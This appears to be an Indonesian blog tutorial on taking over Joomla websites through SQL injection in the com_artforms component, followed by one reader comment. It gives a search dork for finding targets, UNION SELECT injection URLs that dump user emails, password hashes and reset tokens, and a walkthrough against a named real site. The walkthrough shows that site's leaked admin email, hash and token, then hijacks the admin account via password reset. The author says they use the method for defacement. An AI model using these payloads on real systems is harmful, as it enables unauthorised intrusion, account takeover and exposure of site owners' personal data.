dork : inurl:"option com_artforms"
[2] Exploit : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
[3] Reset Password : /index.php?option=com_user&view=reset
[4] Exploit Token : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--
[5] login admin : /administrator
assalamualaikum saya kali ini mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini
jangan takut karna exploit ini masih bisa di gunakan sampai sekarang :) toturial ini sangat simple dan totur ini sering
saya pakai untuk deface website dengan exploit yang 1 ini
ok tanpa basa basi aja ya :) sekarang buka google dan ketik dork di atas
Dork : inurl:"option com_artforms"
bisa juga menggunakan dengan mirc :D bagi yang tau ya saya di sini suka manual karna saya jarang main mirc :D
ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/
target : http://www.avaclean.com/
dan sekarang kita buka web target tadi
contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi
dengan contoh seperti ini :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
dan hasil nya akan seperti ini
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P
dan sekarang kita coba open tab untuk mereset password nya
contoh :
http://www.avaclean.com//index.php?option=com_user&view=reset
dan sekarang masukan email tersebut
josh@bkmediagroup.com
ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4
contoh :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--
dan hasil nya akan menjadi seperti ini
admineda7d6142fac40a533b56407a4617371
ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371 <== yang mana code token nya ?? ok sekarang saya jelas kan
code : [admin]eda7d6142fac40a533b56407a4617371
yang saya kasih dalam tanda kurung itu adalah user nya
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371
dan itu adalah token nya :) ok binggo sekarang user sudah ke reset tinggal masukan password baru aja :D
selamat sekarang anda menjadi admin
untuk joomla login ada biasa nya
contoh login admin : http://localhost/administrator
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi :)
# update
untuk code token sekarang kalau untuk manual kebanyakan biasa nya memakai tanda $$$ contoh token yang tidak bisa di reset seperti ini
:admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$
dan bila kalian menemukan bagian seperti ada tanda $1$c8b6c03c$ tidak bisa di reset password
ok sekian dulu toturial dari saya salam selalu
mohon maaf bila ada salah yang saya berikan ini :) assalamualaikum :)
1 comments:
ini hanya berlaku untuk joomla versi berapa sob?
Post a Comment